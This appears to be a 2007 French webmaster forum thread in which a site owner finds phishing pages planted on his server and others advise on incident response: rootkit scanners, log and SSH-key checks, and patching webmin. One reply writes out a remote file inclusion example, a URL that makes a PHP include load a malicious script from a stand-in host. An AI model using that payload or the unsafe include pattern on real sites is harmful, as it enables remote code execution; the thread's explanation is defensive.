hacking

Discussion dans 'Administration d'un site Web' créé par JeromeRookie, 14 Mars 2007.

  1. JeromeRookie
    JeromeRookie WRInaute occasionnel
    Inscrit:
    11 Août 2003
    Messages:
    340
    J'aime reçus:
    0
    Bonjour,
    j'ai reçu un mail d'un organisme mandaté par une banque italienne m'indiquant que des plaintes de phishing avait été détectées sur une url hébergée sur mon site.... 8O :evil: :evil:

    après vérification, il y a effectivement des fichiers déposés sur mon site par qqun d'autre que moi; après en avoir fait une copie, j'ai tout effacé et ai informé mon hébergeur en infogérence.

    savez-vous ce que je risque concrètement ?

    merci pour votre aide...
     
  2. finstreet
    finstreet WRInaute accro
    Inscrit:
    10 Juillet 2005
    Messages:
    13 357
    J'aime reçus:
    2
    en théorie tu risques rien ... par contre faut vraiment trouver comment tu t'es fait hacker
     
  3. houcine-b
    houcine-b WRInaute discret
    Inscrit:
    28 Janvier 2007
    Messages:
    72
    J'aime reçus:
    0
    les risque juridique aucune idée, mais moi je suis passé par la meme experience que toi, mon hebergeur ma supprimé le site malgré que je suis innocent
     
  4. lolo2e
    lolo2e Nouveau WRInaute
    Inscrit:
    4 Mars 2007
    Messages:
    37
    J'aime reçus:
    0
    Si j'ai bien compris une personne a réussi à transférer des fichiers à lui sur ton site.....

    Tu as fait attention à tes mots de passe !!!!
     
  5. biscuit
    biscuit WRInaute occasionnel
    Inscrit:
    5 Juin 2006
    Messages:
    425
    J'aime reçus:
    0
    surtout aux includes...
     
  6. Jeviensderio
    Jeviensderio WRInaute passionné
    Inscrit:
    29 Septembre 2006
    Messages:
    1 053
    J'aime reçus:
    0
    Plus précisément?
     
  7. Topsitemaker
    Topsitemaker WRInaute impliqué
    Inscrit:
    19 Novembre 2006
    Messages:
    527
    J'aime reçus:
    0
    Ca dépend si tu es en mutualisé ou en serveur dédié,
    Dans le 1er cas, ton hébergeur doit rechercher les failles qui ont permis de perçer le serveur. De ton coté tu dois vérifier si ton code php ne présente aucune faille. Faut regarder si tu as des projets 'open source' non patché, notamment.

    Dans le 2ème cas, il faut que tu fasses cette recherche toi -même.
    Dans tous les cas, ca va te prendre du temps à tout checker. Donc dans l'ordre,
    - tu passes un anti-Rootkit comme Chkrootkit ou Rkhunter.
    - Check les logs /var/log/secure, pour voir le hack a eu accès direct à un compte.
    - Check tous les historisations de compte comme /root/.bash_history
    - Check tes clés SSH, pour voir s'ils ne sont pas corrompus
    - Check les logs ftp,
    - Check le répertoire /tmp d'apache
    - les logs apache avec un grep sur le répertoire ou tu t'es fais hacké.

    Il faut tu aies les preuves que tu t'es fait hacké, déjà pour que tu apprennes un minimum sur cette expérience.

    Dans les 2 cas, tu devrais immobiliser le serveur et refondre le système si un compte a été forcé.
     
  8. JeromeRookie
    JeromeRookie WRInaute occasionnel
    Inscrit:
    11 Août 2003
    Messages:
    340
    J'aime reçus:
    0
    merci pour vos réponses. j'ai un serveur virtuels donc j'en suis responsable. mais ne sachant pas faire ce que tu évoques, j'ai un contrat de maintenanc een infogérence. Mon hébergeur est en train de vérifier. à Priori, il s'agirait d'une MAJ de webmin non faite. je vais changer tous les mots de passe.
     
  9. biscuit
    biscuit WRInaute occasionnel
    Inscrit:
    5 Juin 2006
    Messages:
    425
    J'aime reçus:
    0
    si tu as des urls du type call.php?fichier=accueil et que dans ton code tu fait un include $_GET['fichier'], bien vérifier que $_GET['fichier'] soit un de tes fichier car si j'appelle call.php?fichier=http://www.example.com/mon_fichier_malveillant.php je pourrai interpréter n'importe quel script sur ton serveur... (donc = pas bon)
     
  10. Jeviensderio
    Jeviensderio WRInaute passionné
    Inscrit:
    29 Septembre 2006
    Messages:
    1 053
    J'aime reçus:
    0
    Merci. Je vais vérifier cela.
     
  11. easy_zik
    easy_zik WRInaute occasionnel
    Inscrit:
    7 Juillet 2003
    Messages:
    375
    J'aime reçus:
    0
    ASP = beurk :)

    Si c'est des hackeurs anti-asp, ils sont peut etre pas si mauvais que ça :p

    bon, je :arrow:
     
  12. shelcko
    shelcko WRInaute discret
    Inscrit:
    1 Janvier 2007
    Messages:
    211
    J'aime reçus:
    0
    t'as un tuto sur les failles includes ici
     
Chargement...
Similar Threads - hacking Forum Date
Piratage/Hacking - Millions de pages indéxées Problèmes de référencement spécifiques à vos sites 3 Février 2022
Hacking sur la page vue par Google Bot (non WP) Problèmes de référencement spécifiques à vos sites 1 Août 2021
99% arrive sur des pages 404 suite hacking Problèmes de référencement spécifiques à vos sites 15 Décembre 2016
Se former au Growth Hacking? Débuter en référencement 5 Décembre 2016
wordpress et le hacking Développement d'un site Web ou d'une appli mobile 4 Janvier 2015
Problème hacking Wordpress - fichiers wp-sample.php et wp-admin/wp-user.php Débuter en référencement 30 Avril 2014
Hacking du site et redirection vers un autre Problèmes de référencement spécifiques à vos sites 16 Décembre 2011
hacking wordpress 3.2.1 avec changement de .htacess Administration d'un site Web 27 Novembre 2011
Hacking sur ma home Administration d'un site Web 23 Novembre 2011
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
Concours de hacking : l'iPhone, Safari, IE8 et Firefox tombent, Chrome résiste Google : l'entreprise, les sites web, les services 25 Mars 2010
Logiciel ou Script d'analyse Logs Apache / hacking ? Administration d'un site Web 17 Juin 2008
Hacking, oui, mais lequel ? Administration d'un site Web 4 Mai 2008
Hacking et Spaming Demandes d'avis et de conseils sur vos sites 4 Mars 2007
tentative de hacking sur mon site? Demandes d'avis et de conseils sur vos sites 29 Janvier 2007
que faire pour se protéger après une tentative de hacking ? Administration d'un site Web 15 Octobre 2006
Description et titre dans Google apres Hacking Administration d'un site Web 15 Octobre 2006
Vulnérabilité Google - Un (petit) hacking est possible ! Google : l'entreprise, les sites web, les services 26 Septembre 2006
Tentative de Hacking ou Pas? Administration d'un site Web 12 Septembre 2006
HACKING!!! Administration d'un site Web 12 Août 2006